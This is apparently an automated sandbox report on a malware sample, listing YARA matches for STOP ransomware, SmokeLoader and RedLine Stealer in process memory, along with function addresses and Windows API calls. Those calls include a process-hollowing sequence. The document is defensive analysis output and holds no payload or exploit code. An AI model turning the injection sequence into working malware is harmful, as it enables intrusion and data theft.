Source: 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000002.2358317151.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2120426554.0000000000D1F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2120318342.0000000000CC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000012.00000002.2843572828.00000000027F1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000010.00000002.2845428957.00000000027D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2120238789.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: Process Memory Space: DB15.exe PID: 6336, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: DB15.exe PID: 7004, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: DB15.exe PID: 5368, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: DB15.exe PID: 6320, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: DB15.exe PID: 5356, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: DB15.exe PID: 4436, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: DB15.exe PID: 5988, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: DB15.exe PID: 6848, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: DB15.exe PID: 7144, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: DB15.exe PID: 3544, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: A0B.exe.2.dr Static PE information: section name: .vmp{
Source: A0B.exe.2.dr Static PE information: section name: .vmp{
Source: A0B.exe.2.dr Static PE information: section name: .vmp{
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015D5
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401603
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040161A
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_004026D2 NtOpenKey, 0_2_004026D2
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00402745 NtEnumerateKey, 0_2_00402745
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation, 0_2_00402348
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040156B
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00402770 NtEnumerateKey, 0_2_00402770
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation, 0_2_0040217B
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation, 0_2_0040217D
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation, 0_2_004021CB
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_004017DF NtMapViewOfSection,NtMapViewOfSection, 0_2_004017DF
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015E0
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015F1
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015F5
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_004015F8
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation, 0_2_00402188
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_004027A0 NtClose, 0_2_004027A0
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation, 0_2_004021A1
Source: C:\Users\user\Desktop\6uVlPQSJ4e.exe Code function: 0_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation, 0_2_004021BB
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_004015D5
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_00401603
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_0040161A
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_004026D2 NtOpenKey, 6_2_004026D2
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_00402745 NtEnumerateKey, 6_2_00402745
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation, 6_2_00402348
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_0040156B
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_00402770 NtEnumerateKey, 6_2_00402770
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation, 6_2_0040217B
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation, 6_2_0040217D
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation, 6_2_004021CB
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_004017DF NtMapViewOfSection,NtMapViewOfSection, 6_2_004017DF
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_004015E0
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_004015F1
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_004015F5
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_004015F8
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation, 6_2_00402188
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_004027A0 NtClose, 6_2_004027A0
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation, 6_2_004021A1
Source: C:\Users\user\AppData\Roaming\gtdirat Code function: 6_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation, 6_2_004021BB
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_02870110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 11_2_02870110
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_02870110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 16_2_02870110
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_00403CF1 11_2_00403CF1
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_028F22C0 11_2_028F22C0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_02877220 11_2_02877220
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_02877393 11_2_02877393
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_028BE37C 11_2_028BE37C
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0287B0B0 11_2_0287B0B0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_028800D0 11_2_028800D0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_028770E0 11_2_028770E0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_028730F0 11_2_028730F0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0287B000 11_2_0287B000
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0287A026 11_2_0287A026
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0288F030 11_2_0288F030
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0289D1A4 11_2_0289D1A4
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_02879120 11_2_02879120
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_028BE141 11_2_028BE141
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_028BB69F 11_2_028BB69F
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0287A699 11_2_0287A699
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0287E6E0 11_2_0287E6E0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0287A79A 11_2_0287A79A
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0289D7F1 11_2_0289D7F1
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0287C760 11_2_0287C760
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_02873520 11_2_02873520
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_02877520 11_2_02877520
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_02877A80 11_2_02877A80
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0287CA10 11_2_0287CA10
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0287DBE0 11_2_0287DBE0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_02880B00 11_2_02880B00
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_02872B60 11_2_02872B60
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_02877880 11_2_02877880
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_028918D0 11_2_028918D0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0289E9A3 11_2_0289E9A3
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0289F9B0 11_2_0289F9B0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_028789D0 11_2_028789D0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_028759F7 11_2_028759F7
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0287A916 11_2_0287A916
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_0288A930 11_2_0288A930
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_028A4E9F 11_2_028A4E9F
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_02878E60 11_2_02878E60
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_02875DE7 11_2_02875DE7
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_02875DF7 11_2_02875DF7
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 11_2_028B2D1E 11_2_028B2D1E
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040D240 12_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00419F90 12_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040C070 12_2_0040C070
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0042E003 12_2_0042E003
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00408030 12_2_00408030
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00410160 12_2_00410160
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_004C8113 12_2_004C8113
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_004021C0 12_2_004021C0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0044237E 12_2_0044237E
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_004084C0 12_2_004084C0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_004344FF 12_2_004344FF
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0043E5A3 12_2_0043E5A3
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040A660 12_2_0040A660
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0041E690 12_2_0041E690
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00406740 12_2_00406740
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00402750 12_2_00402750
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040A710 12_2_0040A710
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00408780 12_2_00408780
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0042C804 12_2_0042C804
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00406880 12_2_00406880
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_004349F3 12_2_004349F3
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_004069F3 12_2_004069F3
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00402B80 12_2_00402B80
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00406B80 12_2_00406B80
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0044ACFF 12_2_0044ACFF
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0042CE51 12_2_0042CE51
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00434E0B 12_2_00434E0B
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00406EE0 12_2_00406EE0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00420F30 12_2_00420F30
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00405057 12_2_00405057
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0042F010 12_2_0042F010
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_004070E0 12_2_004070E0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_004391F6 12_2_004391F6
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00435240 12_2_00435240
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_004C9343 12_2_004C9343
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00405447 12_2_00405447
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00405457 12_2_00405457
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00449506 12_2_00449506
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0044B5B1 12_2_0044B5B1
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00435675 12_2_00435675
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00409686 12_2_00409686
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040F730 12_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0044D7A1 12_2_0044D7A1
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00481920 12_2_00481920
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0044D9DC 12_2_0044D9DC
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00449A71 12_2_00449A71
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00443B40 12_2_00443B40
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00409CF9 12_2_00409CF9
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040DD40 12_2_0040DD40
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00427D6C 12_2_00427D6C
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0040BDC0 12_2_0040BDC0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00409DFA 12_2_00409DFA
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00409F76 12_2_00409F76
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_0046BFE0 12_2_0046BFE0
Source: C:\Users\user\AppData\Local\Temp\DB15.exe Code function: 12_2_00449FE3 12_2_00449FE3
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_028F22C0 16_2_028F22C0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_02877220 16_2_02877220
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_02877393 16_2_02877393
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_028BE37C 16_2_028BE37C
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0287B0B0 16_2_0287B0B0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_028800D0 16_2_028800D0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_028770E0 16_2_028770E0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_028730F0 16_2_028730F0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0287B000 16_2_0287B000
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0287A026 16_2_0287A026
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0288F030 16_2_0288F030
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0289D1A4 16_2_0289D1A4
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_02879120 16_2_02879120
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_028BE141 16_2_028BE141
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_028BB69F 16_2_028BB69F
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0287A699 16_2_0287A699
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0287E6E0 16_2_0287E6E0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0287A79A 16_2_0287A79A
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0289D7F1 16_2_0289D7F1
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0287C760 16_2_0287C760
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_02873520 16_2_02873520
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_02877520 16_2_02877520
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_02877A80 16_2_02877A80
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0287CA10 16_2_0287CA10
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0287DBE0 16_2_0287DBE0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_02880B00 16_2_02880B00
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_02872B60 16_2_02872B60
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_02877880 16_2_02877880
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_028918D0 16_2_028918D0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0289E9A3 16_2_0289E9A3
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0289F9B0 16_2_0289F9B0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_028789D0 16_2_028789D0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_028759F7 16_2_028759F7
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0287A916 16_2_0287A916
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_0288A930 16_2_0288A930
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_028A4E9F 16_2_028A4E9F
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_02878E60 16_2_02878E60
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_02875DE7 16_2_02875DE7
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_02875DF7 16_2_02875DF7
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 16_2_028B2D1E 16_2_028B2D1E
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0042E003 17_2_0042E003
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0041E690 17_2_0041E690
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0040F730 17_2_0040F730
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00481920 17_2_00481920
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00419F90 17_2_00419F90
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050D050 17_2_0050D050
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00405057 17_2_00405057
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0040C070 17_2_0040C070
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0042F010 17_2_0042F010
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050D008 17_2_0050D008
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00408030 17_2_00408030
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050D028 17_2_0050D028
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_004070E0 17_2_004070E0
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050D090 17_2_0050D090
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_0050D0A8 17_2_0050D0A8
Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe Code function: 17_2_00410160 17_2_00410160
